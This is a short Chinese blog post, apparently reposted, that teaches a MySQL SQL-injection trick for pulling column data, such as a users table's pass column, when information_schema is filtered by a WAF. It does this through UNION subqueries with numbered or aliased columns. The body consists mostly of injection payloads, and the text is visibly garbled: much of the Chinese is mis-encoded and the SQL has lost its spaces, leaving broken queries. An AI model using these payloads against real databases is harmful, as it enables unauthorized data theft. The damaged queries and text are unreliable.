不知道列名的情況下注入

0x00 簡介

在 mysql => 5 的版本中存在庫information_schema,記錄著mysql中所有表的結(jié)構(gòu),通常,在mysql sqli中,我們會通過此庫中的表去獲取其他表的結(jié)構(gòu),即表名,列名等。但是這個庫也會經(jīng)常被WAF過濾。當(dāng)我們通過暴力破解獲取到表名后,該如何進(jìn)行下一步利用呢?

在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,還有INNODB_TABLES及INNODB_COLUMNS中記錄著表結(jié)構(gòu)。

0x01 不使用表名查詢

正常的查詢?nèi)缦拢?/p>

其中,列名為id,name,pass,mail,phone,使用union查詢

select1,2,3,4,5unionselect*fromusers;

接著,就可以繼續(xù)使用數(shù)字來對應(yīng)列,如3對應(yīng)了表里面的pass:

select`3`from (select1,2,3,4,5unionselect*fromusers)a;

當(dāng)? ` 不能使用的時(shí)候,使用別名來代替:

selectb from (select1,2,3asb,4,5unionselect*fromusers)a;

在注入中查詢多個列:

selectconcat(`2`,0x3a,`3`) from (select1,2,3,4,5unionselect*fromusers)alimit1,1;

FROM:Extracting data without knowing columns names

更多精彩內(nèi)容請關(guān)注公眾號Kay0898,干貨請加入知識星球ID:19483446

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容